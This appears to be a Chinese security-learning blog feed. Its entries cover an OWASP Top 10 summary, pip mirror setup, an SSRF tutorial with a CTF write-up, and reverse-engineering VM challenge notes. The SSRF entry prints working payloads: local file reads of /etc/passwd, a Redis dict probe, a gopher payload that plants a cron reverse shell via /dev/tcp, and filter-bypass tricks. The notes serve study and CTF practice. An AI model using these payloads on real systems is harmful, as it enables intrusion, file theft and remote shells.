<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>搞渗透,挖漏洞,应该了解这些知识基础,我现在对这些东西的理解还不是很清晰,特此来写这一篇文章,逆向方面的话,可能就会比较晚了,感觉reverse-wiki不知到什么时候才可以开张</p><p>OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。<br>其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。</p><h1 id="十大漏洞介绍"><a href="#十大漏洞介绍" class="headerlink" title="十大漏洞介绍"></a>十大漏洞介绍</h1><h2 id="注入漏洞"><a href="#注入漏洞" class="headerlink" title="注入漏洞"></a>注入漏洞</h2><p>注入漏洞是指攻击者通过在应用程序中注入恶意代码,从而获取对应用程序的控制权。常见的注入漏洞包括SQL、OS 命令、ORM、LDAP和表达式语言或者 OGNL 注入。攻击者可以利用这些漏洞来窃取数据、篡改数据、执行任意代码等。注入工具也有很多,这里要介绍下基于 python开发的 SQLmap,SQLmap 支持对 PostgreSql,MySQL,Access,MsSql Server 等数据库的自动化注入。是在检查SQL注入漏洞方面最得力的工具。</p><h2 id="失效的身份认证"><a href="#失效的身份认证" class="headerlink" title="失效的身份认证"></a>失效的身份认证</h2><p>失效的身份认证是指应用程序在身份认证过程中存在缺陷,攻击者可以通过绕过身份认证机制来访问受保护的资源。常见的失效的身份认证漏洞包括弱密码、默认密码、暴力破解、会话劫持、会话固定、不安全的密码存储等。攻击者可以利用这些漏洞来冒充合法用户,窃取用户凭证,或者获取对受保护资源的未授权访问。</p><h2 id="敏感数据泄露"><a href="#敏感数据泄露" class="headerlink" title="敏感数据泄露"></a>敏感数据泄露</h2><p>敏感数据泄露是指应用程序在处理敏感数据时存在缺陷,导致敏感数据被泄露。应用维护或者开发人员无意间上传敏感数据,如 github 文件泄露。敏感数据文件的权限设置错误,如网站目录下的数据库备份文件泄露。网络协议、算法本身的弱点,如 telent、ftp、md5 等 常见的敏感数据泄露漏洞包括不安全的存储、不安全的传输、不安全的日志记录等。攻击者可以利用这些漏洞来窃取用户的个人信息、财务信息、商业机密等。在处理敏感数据时,应该使用加密、访问控制、安全传输等技术来保护数据的安全性。</p><h2 id="XML外部实体注入(XXE)"><a href="#XML外部实体注入(XXE)" class="headerlink" title="XML外部实体注入(XXE)"></a>XML外部实体注入(XXE)</h2><p>XML外部实体注入(XXE)是指攻击者通过在应用程序中注入恶意的XML实体,从而获取对应用程序的控制权。常见的XXE漏洞包括不安全的XML解析器、不安全的XML配置、不安全的XML库等。攻击者可以利用这些漏洞来窃取数据、执行任意代码等。在处理XML数据时,应该使用安全的XML解析器、配置和库,并禁用外部实体解析。</p><h2 id="无效的访问控制"><a href="#无效的访问控制" class="headerlink" title="无效的访问控制"></a>无效的访问控制</h2><p>无效的访问控制是指应用程序在访问控制过程中存在缺陷,导致未授权用户可以访问受保护的资源。常见的无效的访问控制漏洞包括不正确的权限检查、不正确的角色检查、不正确的访问控制策略等。攻击者可以利用这些漏洞来访问受保护的资源,窃取数据、篡改数据等。在实现访问控制时,应该使用严格的权限检查、角色检查和访问控制策略,并确保只有授权用户才能访问受保护的资源。<br>绕过路径,如未读取的参数做检查,导致路径绕过读取到敏感文件<br>权限提升,如未对权限做检查,导致攻击者变更权限<br>垂直越权,攻击者可以从普通的用户权限提升到管理员的权限访问应用程序<br>水平越权,攻击者可以从普通用户A的权限提升到普通用户B的权限访问应用程序</p><h2 id="安全配置错误"><a href="#安全配置错误" class="headerlink" title="安全配置错误"></a>安全配置错误</h2><p>安全配置错误是指应用程序在配置过程中存在缺陷,导致应用程序存在安全风险。常见的安全配置错误漏洞包括不安全的默认配置、不安全的配置文件、不安全的配置参数等。攻击者可以利用这些漏洞来获取对应用程序的控制权,窃取数据、执行任意代码等。在配置应用程序时,应该使用安全的默认配置、配置文件和配置参数,并定期检查和更新配置。</p><h2 id="跨站脚本(XSS)"><a href="#跨站脚本(XSS)" class="headerlink" title="跨站脚本(XSS)"></a>跨站脚本(XSS)</h2><p>跨站脚本(XSS)是指攻击者通过在应用程序中注入恶意脚本,从而获取对应用程序的控制权。常见的XSS漏洞包括反射型XSS、存储型XSS、DOM型XSS等。攻击者可以利用这些漏洞来窃取用户的个人信息、会话信息、执行恶意代码等。在处理用户输入时,应该使用安全的编码和过滤技术,并确保只有授权用户才能访问受保护的资源。</p><h2 id="不安全的反序列化"><a href="#不安全的反序列化" class="headerlink" title="不安全的反序列化"></a>不安全的反序列化</h2><p>不安全的反序列化是指应用程序在反序列化过程中存在缺陷,导致恶意数据被反序列化为对象,从而获取对应用程序的控制权。常见的反序列化漏洞包括不安全的反序列化库、不安全的反序列化配置等。攻击者可以利用这些漏洞来执行任意代码、窃取数据等。在反序列化数据时,应该使用安全的反序列化库和配置,并确保只有授权用户才能反序列化数据。</p><h2 id="使用含有已知漏洞的组件"><a href="#使用含有已知漏洞的组件" class="headerlink" title="使用含有已知漏洞的组件"></a>使用含有已知漏洞的组件</h2><p>使用含有已知漏洞的组件是指应用程序在开发过程中使用了含有已知漏洞的组件,导致应用程序存在安全风险。常见的使用含有已知漏洞的组件漏洞包括使用含有已知漏洞的库、框架、插件等。攻击者可以利用这些漏洞来获取对应用程序的控制权,窃取数据、执行任意代码等。在开发应用程序时,应该使用安全的组件,并及时更新和修补含有已知漏洞的组件。</p><h2 id="不足的日志记录和监控"><a href="#不足的日志记录和监控" class="headerlink" title="不足的日志记录和监控"></a>不足的日志记录和监控</h2><p>不足的日志记录和监控是指应用程序在日志记录和监控过程中存在缺陷,导致无法及时发现和响应安全事件。常见的不足的日志记录和监控漏洞包括不完整的日志记录、不充分的日志监控、不及时的日志响应等。攻击者可以利用这些漏洞来隐藏攻击行为、绕过安全机制等。在日志记录和监控过程中,应该使用完整的日志记录、充分的日志监控和及时的日志响应,并确保安全事件能够被及时发现和响应。</p>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>熊猫烧香分析</title>
<link href="/2024/11/15/%E7%86%8A%E7%8C%AB%E7%83%A7%E9%A6%99%E5%88%86%E6%9E%90/"/>
<url>/2024/11/15/%E7%86%8A%E7%8C%AB%E7%83%A7%E9%A6%99%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>本来打算搞个奶龙烧香的但是今天不是很想搞先弄弄web的几个大点,明天再来看看能不能复现一下,现在的电脑安全都太高了,熊猫烧香直接要么被杀要么就是不符合系统,有点麻烦</p>]]></content>
</entry>
<entry>
<title>pip下载</title>
<link href="/2024/11/07/pip%E4%B8%8B%E8%BD%BD/"/>
<url>/2024/11/07/pip%E4%B8%8B%E8%BD%BD/</url>
<content type="html"><![CDATA[<h1 id="pip下载"><a href="#pip下载" class="headerlink" title="pip下载"></a>pip下载</h1><h2 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">pip install -i https://pypi.tuna.tsinghua.edu.cn/simple <package><br></code></pre></td></tr></table></figure><h2 id="下载指定版本"><a href="#下载指定版本" class="headerlink" title="下载指定版本"></a>下载指定版本</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">pip install -i https://pypi.tuna.tsinghua.edu.cn/simple <package>==<version><br></code></pre></td></tr></table></figure><h2 id="永久配置国内镜像源"><a href="#永久配置国内镜像源" class="headerlink" title="永久配置国内镜像源"></a>永久配置国内镜像源</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple<br></code></pre></td></tr></table></figure><h2 id="配置多个镜像源"><a href="#配置多个镜像源" class="headerlink" title="配置多个镜像源"></a>配置多个镜像源</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">[global]<br>index-url = https://pypi.tuna.tsinghua.edu.cn/simple<br>extra-index-url = https://pypi.douban.com/simple<br>extra-index-url = https://mirrors.aliyun.com/pypi/simple/<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>ssrf</title>
<link href="/2024/11/07/ssrf/"/>
<url>/2024/11/07/ssrf/</url>
<content type="html"><![CDATA[<h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h1><p>SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。<br><a href="https://www.cnblogs.com/miruier/p/13907150.html">SSRF漏洞(原理、挖掘点、漏洞利用、修复建议</a><br><a href="https://zhuanlan.zhihu.com/p/112055947">Gopher协议在SSRF漏洞中的深入研究</a></p><h1 id="具体内容"><a href="#具体内容" class="headerlink" title="具体内容"></a>具体内容</h1><h2 id="主要攻击方式"><a href="#主要攻击方式" class="headerlink" title="主要攻击方式"></a>主要攻击方式</h2><ul><li>对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息</li><li>攻击运行在内网或本地的应用程序</li><li>对内网Web应用进行指纹识别,识别企业内部的资产信息</li><li>攻击内外网的Web应用,主要是使用HTTP GET请求就可以实现的攻击(比如struts2、SQli等)</li><li>利用file协议读取本地文件等<blockquote><p><a href="http://payloads.net/ssrf.php?url=192.168.1.10:3306">http://payloads.net/ssrf.php?url=192.168.1.10:3306</a><br><a href="http://payloads.net/ssrf.php?url=file:///c:/windows/win.ini">http://payloads.net/ssrf.php?url=file:///c:/windows/win.ini</a></p></blockquote></li></ul><h2 id="产生的相关函数"><a href="#产生的相关函数" class="headerlink" title="产生的相关函数"></a>产生的相关函数</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">file_get_contents</span>()、<span class="hljs-title function_ invoke__">fsockopen</span>()、<span class="hljs-title function_ invoke__">curl_exec</span>()、<span class="hljs-title function_ invoke__">fopen</span>()、<span class="hljs-title function_ invoke__">readfile</span>()<br></code></pre></td></tr></table></figure><h3 id="函数解释"><a href="#函数解释" class="headerlink" title="函数解释"></a>函数解释</h3><ol><li><p>file_get_contents()</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-variable">$url</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>];;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$url</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>从指定的url获取内容,然后指定到一个文件名进行保存,并展示给用户,file_put_content则是把一个字符串写入文件中</p></li><li><p>fsockopen()</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">GetFile</span>(<span class="hljs-params"><span class="hljs-variable">$host</span>,<span class="hljs-variable">$port</span>,<span class="hljs-variable">$link</span></span>) </span>{ <br> <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fsockopen</span>(<span class="hljs-variable">$host</span>, <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$port</span>), <span class="hljs-variable">$errno</span>, <span class="hljs-variable">$errstr</span>, <span class="hljs-number">30</span>); <br> <span class="hljs-keyword">if</span> (!<span class="hljs-variable">$fp</span>) { <br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"<span class="hljs-subst">$errstr</span> (error number <span class="hljs-subst">$errno</span>) \n"</span>; <br> } <span class="hljs-keyword">else</span> { <br> <span class="hljs-variable">$out</span> = <span class="hljs-string">"GET <span class="hljs-subst">$link</span> HTTP/1.1\r\n"</span>; <br> <span class="hljs-variable">$out</span> .= <span class="hljs-string">"Host: <span class="hljs-subst">$host</span>\r\n"</span>; <br> <span class="hljs-variable">$out</span> .= <span class="hljs-string">"Connection: Close\r\n\r\n"</span>; <br> <span class="hljs-variable">$out</span> .= <span class="hljs-string">"\r\n"</span>; <br> <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-variable">$out</span>); <br> <span class="hljs-variable">$contents</span>=<span class="hljs-string">''</span>; <br> <span class="hljs-keyword">while</span> (!<span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$fp</span>)) { <br> <span class="hljs-variable">$contents</span>.= <span class="hljs-title function_ invoke__">fgets</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-number">1024</span>); <br> } <br> <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>); <br> <span class="hljs-keyword">return</span> <span class="hljs-variable">$contents</span>; <br> } <br>}<br></code></pre></td></tr></table></figure><p>fsockopen函数实现对用户指定url数据的获取,使用端口建立tcp连接,变量host为主机名,port为端口,errstr表示错误以字符传的信息返回,30为时限</p></li><li><p>curl_exec()</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span> <br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'url'</span>])){<br> <span class="hljs-variable">$link</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">'url'</span>];<br> <span class="hljs-variable">$curlobj</span> = <span class="hljs-title function_ invoke__">curl_init</span>();<span class="hljs-comment">// 创建新的 cURL 资源</span><br> <span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>, CURLOPT_POST, <span class="hljs-number">0</span>);<br> <span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>,CURLOPT_URL,<span class="hljs-variable">$link</span>);<br> <span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>, CURLOPT_RETURNTRANSFER, <span class="hljs-number">1</span>);<span class="hljs-comment">// 设置 URL 和相应的选项</span><br> <span class="hljs-variable">$result</span>=<span class="hljs-title function_ invoke__">curl_exec</span>(<span class="hljs-variable">$curlobj</span>);<span class="hljs-comment">// 抓取 URL 并把它传递给浏览器</span><br> <span class="hljs-title function_ invoke__">curl_close</span>(<span class="hljs-variable">$curlobj</span>);<span class="hljs-comment">// 关闭 cURL 资源,并且释放系统资源</span><br><br> <span class="hljs-variable">$filename</span> = <span class="hljs-string">'./curled/'</span>.<span class="hljs-title function_ invoke__">rand</span>().<span class="hljs-string">'.txt'</span>;<br> <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$filename</span>, <span class="hljs-variable">$result</span>); <br> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$result</span>;<br>}<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>curl_exec函数用于执行指定的cURL会话</p><blockquote><p>1.一般情况下PHP不会开启fopen的gopher wrapper<br>2.file_get_contents的gopher协议不能URL编码<br>3.file_get_contents关于Gopher的302跳转会出现bug,导致利用失败<br>4.curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用<br>5.curl_exec() //默认不跟踪跳转,<br>6.file_get_contents() // file_get_contents支持php://input协议</p></blockquote></li></ol><h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h2><ol><li>使用file协议 file protocol (任意文件读取)<blockquote><p>curl -vvv “<a href="http://target/ssrf.php?url=file:///etc/passwd">http://target/ssrf.php?url=file:///etc/passwd</a>“</p></blockquote></li><li>使用dict协议 dict protocol (获取Redis配置信息)<blockquote><p>curl -vvv “<a href="http://target/ssrf.php?url=dict://127.0.0.1:6379/info">http://target/ssrf.php?url=dict://127.0.0.1:6379/info</a>“</p></blockquote></li><li>使用gopher协议(俗称万能协议) gopher protocol (一键反弹Bash)<blockquote><p>curl -vvv “<a href="http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1">http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1</a> %0d %0a $8%0d %0aflushall %0d %0a<em>3 %0d %0a $3%0d %0aset %0d %0a $1%0d %0a1 %0d %0a $64%0d %0a %0d %0a %0a %0a</em>/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 %0a %0a %0a %0a %0a %0d %0a %0d %0a %0d %0a<em>4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $3%0d %0adir %0d %0a $16%0d %0a/var/spool/cron/ %0d %0a</em>4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $10%0d %0adbfilename %0d %0a $4%0d %0aroot %0d %0a*1 %0d %0a $4%0d %0asave %0d %0aquit %0d %0a”</p></blockquote></li></ol><h2 id="SSRF漏洞绕过方法"><a href="#SSRF漏洞绕过方法" class="headerlink" title="SSRF漏洞绕过方法"></a>SSRF漏洞绕过方法</h2><p>-常用的绕过方法<br> 1.@ <a href="http://abc.com@127.0.0.1/">http://abc.com@127.0.0.1</a></p><p> 2.添加端口号 <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080</a></p><p> 3.短地址 <a href="https://0x9.me/cuGfD">https://0x9.me/cuGfD</a><br>推荐:<a href="http://tool.chinaz.com/tools/dwz.aspx%E3%80%81https://dwz.cn/">http://tool.chinaz.com/tools/dwz.aspx、https://dwz.cn/</a></p><p> 4.可以指向任意ip的域名 xip.io<br>原理是DNS解析。xip.io可以指向任意域名,即127.0.0.1.xip.io,可解析为127.0.0.1</p><p> 5.ip地址转换成进制来访问 192.168.0.1=3232235521(十进制) </p><p> 6.非HTTP协议</p><p> 7.DNS Rebinding</p><p> 8.利用[::]绕过 http://[::]:80/ >>> <a href="http://127.0.0.1/">http://127.0.0.1</a></p><p> 9.句号绕过 127。0。0。1 >>> 127.0.0.1</p><p> 10.利用302跳转绕过 使用<a href="https://tinyurl.com生成302跳转地址/">https://tinyurl.com生成302跳转地址</a></p><h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h1><h2 id="HNCTF-2022-WEEK2-ez-ssrf"><a href="#HNCTF-2022-WEEK2-ez-ssrf" class="headerlink" title="[HNCTF 2022 WEEK2]ez_ssrf"></a>[HNCTF 2022 WEEK2]ez_ssrf</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-variable">$data</span>=<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'data'</span>]);<br><span class="hljs-variable">$host</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'host'</span>];<br><span class="hljs-variable">$port</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'port'</span>];<br><span class="hljs-variable">$fp</span>=<span class="hljs-title function_ invoke__">fsockopen</span>(<span class="hljs-variable">$host</span>,<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$port</span>),<span class="hljs-variable">$error</span>,<span class="hljs-variable">$errstr</span>,<span class="hljs-number">30</span>);<br><span class="hljs-keyword">if</span>(!<span class="hljs-variable">$fp</span>) {<br> <span class="hljs-keyword">die</span>();<br>}<br><span class="hljs-keyword">else</span> {<br> <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>,<span class="hljs-variable">$data</span>);<br> <span class="hljs-keyword">while</span>(!<span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$data</span>))<br> {<br> <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">fgets</span>(<span class="hljs-variable">$fp</span>,<span class="hljs-number">128</span>);<br> }<br> <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>}<br></code></pre></td></tr></table></figure><p>扫描本地文件发现有flag.php,尝试读取,发现🥰localhost plz🥰,要从本地读取,利用fsockopen的协议构造payload,创建来自本地的请求,有一个坑点就是data的数据构造是利用php来生成的base64加密,不然会出现问题</p><blockquote><p> ?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-variable">$out</span> = <span class="hljs-string">"GET /flag.php HTTP/1.1\r\n"</span>;<br><span class="hljs-variable">$out</span> .= <span class="hljs-string">"Host: 127.0.0.1\r\n"</span>;<br><span class="hljs-variable">$out</span> .= <span class="hljs-string">"Connection: Close\r\n\r\n"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$out</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-variable">$out</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>GET /flag.php HTTP/1.1<br>Host: 127.0.0.1<br>Connection: Close<br>R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>逆向出题记录</title>
<link href="/2024/11/05/%E9%80%86%E5%90%91%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/"/>
<url>/2024/11/05/%E9%80%86%E5%90%91%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="逆向出题记录"><a href="#逆向出题记录" class="headerlink" title="逆向出题记录"></a>逆向出题记录</h1><p>既然要出题还是新手题就要先了解,出什么题型,这个题有什么用,对工具有什么需求<br>先说一下题型逆向新生题主要有这些(base64,tea家族,动态调试,花指令,打包和反编译,压缩壳,z3,迷宫)<br>先测试一下base64</p><h2 id="2024-11-05"><a href="#2024-11-05" class="headerlink" title="2024-11-05"></a>2024-11-05</h2><h3 id="1-题目描述"><a href="#1-题目描述" class="headerlink" title="1. 题目描述"></a>1. 题目描述</h3><p>题目名称:flag</p><p>题目描述:flag{1234567890}</p><p>题目附件:flag.exe</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>ctf_vm虚拟机</title>
<link href="/2024/11/02/ctf-vm%E8%99%9A%E6%8B%9F%E6%9C%BA/"/>
<url>/2024/11/02/ctf-vm%E8%99%9A%E6%8B%9F%E6%9C%BA/</url>
<content type="html"><![CDATA[<h1 id="ctf-vm虚拟机"><a href="#ctf-vm虚拟机" class="headerlink" title="ctf_vm虚拟机"></a>ctf_vm虚拟机</h1><p>最近打些大比赛果然都有这个虚拟机,但是本人学的不够精细,这次强网杯又有了,借此机会来开个新篇章让自己的技术和见识都涨涨</p><h2 id="HGAME-2023-week4-vm"><a href="#HGAME-2023-week4-vm" class="headerlink" title="[HGAME 2023 week4]vm"></a>[HGAME 2023 week4]vm</h2><p>先借助去年的HGAME来了解一下,这个题非常好,因为已经有了较多的wp可以借助前人的智慧来分析分析,虚拟机题简单来讲就是利用伪代码,在程序中重新实现了一个虚拟机,其实就是把几个重要的汇编代码隐藏起来了而已,我们就要去分析在哪发生了什么。</p><ul><li>查壳<br>可以看出这个是c++编写的64位EXE程序,没有壳<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021001405.png" srcset="/img/loading.gif" lazyload></li><li>IDA分析<br>可见这个直接就是一个简单的判断我们直达vm虚拟机内部<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021004776.png" srcset="/img/loading.gif" lazyload><br>这代表这这个命令函数的最大值是255(0xff)<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021005546.png" srcset="/img/loading.gif" lazyload><br>进入虚拟机主要函数,逐步分析每个分支分别代表什么<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021021368.png" srcset="/img/loading.gif" lazyload><br>我们来看看每个函数的内部来了解发生了什么</li></ul><ol><li>mov<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021023687.png" srcset="/img/loading.gif" lazyload></li><li>push&pop<br>这两个同理<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021026035.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411021027121.png" srcset="/img/loading.gif" lazyload></li><li>mul数据计算单元<br>感觉和我们之前学的数电计算单元一样,单独分出了一个模块来运算操作,分别是【+、-、*、^、<<、>>、0】<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021031712.png" srcset="/img/loading.gif" lazyload></li><li>cmp比较单元<br>直接看就看出来了,从cmp也是相同为0不同为1<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021033928.png" srcset="/img/loading.gif" lazyload></li><li>jmp跳转单元<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021034959.png" srcset="/img/loading.gif" lazyload></li><li>je和jne<br>相同跳转和不相同跳转<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021037299.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411021037492.png" srcset="/img/loading.gif" lazyload></li></ol><p>至此已分析完毕,很简单对不对,汇编语句总共就那么多条,常用且能用的就更少了我们只要仔细分析就行</p><ul><li>exp<br>直接抄的,这个其实涉及一些idc脚本的编写,之后我也会出一篇博客来讲,怎么利用idc脚本去进行SMC的解密以及花指令的去除<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><code class="hljs python">opcode = [<span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x03</span>,<span class="hljs-number">0x00</span>, <span class="hljs-number">0x00</span>,<span class="hljs-number">0x00</span>, 